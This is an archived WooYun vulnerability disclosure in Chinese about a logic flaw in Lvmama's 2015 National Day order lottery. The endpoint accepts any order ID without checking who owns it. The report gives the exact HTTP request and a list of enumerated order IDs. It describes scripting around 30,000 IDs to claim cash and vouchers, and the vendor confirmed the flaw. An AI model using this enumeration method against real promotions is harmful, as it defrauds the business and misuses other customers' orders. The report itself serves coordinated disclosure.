当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0143030

漏洞标题:驴妈妈旅游网逻辑漏洞(恶意刷奖金/兑换劵)

相关厂商:驴妈妈旅游网

漏洞作者: Xmyth_Xi2oMin9

提交时间:2015-09-23 19:12

修复时间:2015-11-08 09:20

公开时间:2015-11-08 09:20

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-23: 细节已通知厂商并且等待厂商处理中
2015-09-24: 厂商已经确认,细节仅向厂商公开
2015-10-04: 细节向核心白帽子及相关领域专家公开
2015-10-14: 细节向普通白帽子公开
2015-10-24: 细节向实习白帽子公开
2015-11-08: 细节向公众公开

简要描述:

RT

详细说明:

URL:http://m.lvmama.com/static/zt/3.0.0/1508/guoqing/?from=timeline&isappinstalled=1
国庆促销活动(下单抽大奖):

1、活动时间:2015.9.9-2015.10.7;
2、在2015.9.9-2015.10.7期间订购的旅游产品,用户可凭支付订单号抽奖一次;
3、奖金相当于现金,请到客户端【我的-钱包】中查看,可在适用奖金抵扣的产品中使用;
4、星巴克券,凭短信收到的券码登陆“到家美食会”官网或APP领取(此券仅限上海地区新用户使用);
5、实物奖品,用户完成游玩的第7个工作日将快递到家;


问题出现在这:

GET /activity/index.php?s=L1509/shiyiChoujiang&orderId=24405424[看这里看这里]&v=0.2912047831341624&callback=jQuery17203623770074918866_1443005183879&_=1443006150195 HTTP/1.1
Host: m.lvmama.com
Proxy-Connection: keep-alive
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Referer: http://m.lvmama.com/static/zt/3.0.0/1508/guoqing/?from=timeline&isappinstalled=1
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8


根据要求我们首先去下单,获得一个订单号(24405434),再写一个脚本跑一些获取到大概三万多可以参加抽奖的订单号。

34.jpg


举个栗子:

24405233
24405239
24405241
24405244
24405245
24405246
24405248
24405251
24405255
24405256
24405257
24405260
24405261
24405262
24405263
24405265
24405268
24405272
24405274
24405277
24405279
24405280
24405283
24405288
24405290
24405291
24405295
24405296
24405297
24405298
24405300
24405301
24405302
24405307
24405310
24405311
24405313
24405314
24405317
24405318
24405320
24405321
24405322
24405324
24405325
24405327
24405331
24405334
24405336
24405338
24405339
24405340
24405342
24405344
24405345
24405346
24405347
24405350
24405354
24405355
24405357
24405358
24405359
24405363
24405365
24405366
24405371
24405376
24405380
24405382
24405386
24405388


然后我们就开始刷起来。 :-)

漏洞证明:

因为是抽奖,多数都5元现金和星巴克兑换券。而我这里只是简单的脚本跑了一下就跑出三万多可以参与抽奖的!而我用别的账号测试了领取了85块了,然而星巴克劵多的吓人= =!

44.jpg

445.png


我在想我会不会中一个马尔代夫或者1000元奖金呢。

修复方案:

加个验证码 核实订单号是否是参加抽奖的用户的订单

版权声明:转载请注明来源 Xmyth_Xi2oMin9@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-09-24 09:18

厂商回复:

谢谢

最新状态:

暂无